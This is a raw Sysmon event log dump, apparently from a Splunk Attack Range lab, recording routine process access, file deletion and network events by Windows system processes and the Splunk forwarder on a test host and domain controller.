11:17:44.155{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221512Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.155{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221511Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.155{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221510Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.155{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221509Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.155{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-17D8-6216-1605-000000003902}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221508Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.155{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-17D8-6216-1605-000000003902}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221507Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.156{4F8D34B0-17D8-6216-1605-000000003902}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221506Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.124{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=047C060AE218C3A5B2857A546701F319,SHA256=BB90A21B62757AA44712E4767E54359BB87A9150D88FC8CACD26EC5517266F9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221536Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:45.296{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDC59469D7E47303CBF4BDD54619C242,SHA256=9FA0359B12C383E97DEE8C11C71657C0CEC4EBC19FA1838C882D9615FF85E3F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:45.855{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:45.855{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=DDF0C2622258DF5AE8CB415CDCD08019,SHA256=8D6A5261E229A9B08573C28F549FA17C3A3F874B54F56CF5CC5C177B05CC6774,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:45.824{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000297687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:45.724{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000297686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:43.552{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49469-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000297685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:45.708{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:45.020{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46B0F38FFD0C5E88A2D2311BD38A62F1,SHA256=2436A88555A4FD52027EB00CAB901A3B775F51061A86AB790B4F98BD0366D982,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221535Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:45.171{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EADE4A3AF6990709DB1DFFC09461A76D,SHA256=064659948EED8A7997A2CF087B12146E702DC25C2B0DE84C1E7F8923E1BD9464,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221534Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:45.171{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F30DC6F70CF3453632B712C290BC2ACA,SHA256=A24BCB4325366A8820F5DC82955E62307759604EDFCA925E797D3B3FB1C7B4AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221551Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.718{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-17DA-6216-1805-000000003902}3112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221550Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.718{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221549Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.718{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221548Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.718{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221547Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.718{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221546Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.718{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221545Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.718{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221544Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.718{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221543Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.718{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221542Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.718{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221541Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.718{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-17DA-6216-1805-000000003902}3112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221540Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.718{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-17DA-6216-1805-000000003902}3112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 